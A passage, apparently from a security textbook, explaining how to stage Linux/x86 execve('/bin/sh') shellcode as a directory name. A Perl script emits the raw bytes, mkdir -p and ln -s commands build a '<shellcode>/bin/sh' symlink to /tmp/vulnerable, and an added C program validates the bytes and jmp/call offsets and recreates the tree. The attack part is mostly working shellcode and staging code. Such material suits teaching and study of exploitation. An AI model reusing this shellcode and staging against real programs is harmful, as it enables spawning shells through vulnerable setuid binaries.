pl to print the assembled shellcode
minus the string "/bin/sh":
#!/usr/bin/perl
binmode(STDOUT);   # emit the raw bytes with no newline or charset translation
# jmp/call pair: pop esi leaves esi pointing just past the code, where "/bin/sh" will sit
print "\xeb\x0f\x5e\x31\xc0\x50\x89\xe2\x56\x89\xe1" .   # jmp +15; pop esi; xor eax,eax; push eax; mov edx,esp; push esi; mov ecx,esp
"\xb0\x0b\x89\xf3\xcd\x80\xe8\xec\xff\xff\xff";          # mov al,11; mov ebx,esi; int 0x80; call -20 (back to pop esi)
NOTE Perl's binmode function is used to place a stream in binary transfer
mode. In binary mode, a stream will not perform any character conversions
(such as newline translation or Unicode expansion) on the data that traverses the stream. While this
function may not be required on all platforms (it is a no-op on Linux), we include it here to make the
script as portable as possible.
Next you create a directory name from the shellcode. This works because Linux allows
any byte except NUL (0x00) and the slash (0x2f) to be part of a directory or filename, and the
shellcode above contains neither. To overcome the restriction
on using / in a filename, you append /bin to the shellcode by creating a subdirectory at
the same time:
# mkdir -p `./nq_aleph.pl`/bin
And last you create the symlink that appends /sh onto your shellcode:
# ln -s /tmp/vulnerable `./nq_aleph.pl`/bin/sh
Which leaves us with:
# ls -lR *
-rwxr--r-- 1 demo demo 195 Jul 8 10:08 nq_aleph.pl
??^?v?1??F??F??????N??V????1?›??@????????:
total 1
drwxr-xr-x 2 demo demo 1024 Jul 8 10:13 bin
??^?v?1??F??F??????N??V????1?›??@????????/bin:
total 0
lrwxrwxrwx 1 demo demo 15 Jul 8 10:13 sh -> /tmp/vulnerable
Notice the garbage characters in the first subdirectory name: ls is printing the raw shellcode bytes that make up the name. The symlink's reported size, 15, is the length of its target string, /tmp/vulnerable.
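The procedure above has two requirements that are easy to get wrong when the shellcode is changed: every byte must be legal in a path component, and the call's pushed return address must land exactly at the end of the code so that the "/bin/sh" appended by the directory tree is what execve receives. The following C program is an added example, not code from the book or from nq_aleph.pl: it checks both properties on the same 22 bytes and then recreates the mkdir -p / ln -s steps under a scratch directory made with mkdtemp (assumed writable, under /tmp), linking to /tmp/vulnerable as on the page. It does not execute the shellcode.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Explicit prototypes so the file also builds under a strict -std=c99. */
char *mkdtemp(char *template);
int symlink(const char *target, const char *linkpath);

/* Linux/x86 execve shellcode from the page, without its "/bin/sh" string.
 * The jmp/call pair leaves esi pointing at whatever follows the code. */
static const unsigned char shellcode[] =
    "\xeb\x0f"              /* jmp  +15  -> the call below                */
    "\x5e"                  /* pop  esi  -> esi = address after the code  */
    "\x31\xc0"              /* xor  eax, eax                               */
    "\x50"                  /* push eax  (NULL)                            */
    "\x89\xe2"              /* mov  edx, esp   (envp)                      */
    "\x56"                  /* push esi                                    */
    "\x89\xe1"              /* mov  ecx, esp   (argv = {esi, NULL})        */
    "\xb0\x0b"              /* mov  al, 11     (execve)                    */
    "\x89\xf3"              /* mov  ebx, esi   (filename)                  */
    "\xcd\x80"              /* int  0x80                                   */
    "\xe8\xec\xff\xff\xff"; /* call -20  -> back to pop esi                */
#define SHELLCODE_LEN (sizeof(shellcode) - 1) /* 22 bytes */

/* A Linux path component may contain any byte except NUL and '/'. */
int filename_safe(const unsigned char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (buf[i] == 0x00 || buf[i] == '/')
            return 0;
    return 1;
}

/* Decode the jmp/call pair and return the offset the call pushes as its
 * return address, i.e. where the path string must begin. Returns -1 if the
 * bytes do not have the expected jmp ... call shape. */
long string_offset(const unsigned char *sc, size_t n)
{
    if (n < 2 || sc[0] != 0xeb)
        return -1;
    long jmp_target = 2 + (int8_t)sc[1];          /* rel8, from end of jmp */
    if (jmp_target < 0 || (size_t)jmp_target + 5 > n || sc[jmp_target] != 0xe8)
        return -1;
    uint32_t rel = (uint32_t)sc[jmp_target + 1]
                 | (uint32_t)sc[jmp_target + 2] << 8
                 | (uint32_t)sc[jmp_target + 3] << 16
                 | (uint32_t)sc[jmp_target + 4] << 24;
    long ret = jmp_target + 5;                    /* pushed return address */
    long call_target = ret + (int32_t)rel;
    if (call_target < 0 || call_target >= (long)n || sc[call_target] != 0x5e)
        return -1;                                /* must land on pop esi */
    return ret;
}

/* Recreate `mkdir -p <shellcode>/bin` and `ln -s target <shellcode>/bin/sh`
 * under base; writes the symlink's full path to out. Returns 0 on success. */
int build_shellcode_path(const char *base, const char *target,
                         char *out, size_t outlen)
{
    char path[4096];
    size_t len = strlen(base);

    if (!filename_safe(shellcode, SHELLCODE_LEN))
        return -1;
    if (string_offset(shellcode, SHELLCODE_LEN) != (long)SHELLCODE_LEN)
        return -1;                 /* string must directly follow the code */
    if (len + 1 + SHELLCODE_LEN + sizeof("/bin/sh") > sizeof path)
        return -1;

    memcpy(path, base, len);
    path[len++] = '/';
    memcpy(path + len, shellcode, SHELLCODE_LEN);  /* directory named by raw code */
    len += SHELLCODE_LEN;
    path[len] = '\0';
    if (mkdir(path, 0755) != 0)
        return -1;
    memcpy(path + len, "/bin", sizeof "/bin");
    if (mkdir(path, 0755) != 0)
        return -1;
    memcpy(path + len, "/bin/sh", sizeof "/bin/sh");
    if (symlink(target, path) != 0)
        return -1;
    if (strlen(path) + 1 > outlen)
        return -1;
    strcpy(out, path);
    return 0;
}

int main(void)
{
    char base[] = "/tmp/nq_alephXXXXXX";   /* scratch directory, assumed writable */
    char link[4096];

    if (!mkdtemp(base)) { perror("mkdtemp"); return 1; }
    if (build_shellcode_path(base, "/tmp/vulnerable", link, sizeof link) != 0) {
        perror("build_shellcode_path"); return 1;
    }
    printf("created symlink under %s, path length %zu\n", base, strlen(link));
    return 0;
}
```

The resulting link name ends in the 22 raw shellcode bytes followed by "/bin/sh", which is exactly the layout the jmp/call trick depends on; if you swap in different shellcode, string_offset returning anything other than its length means the path string would no longer start where esi points.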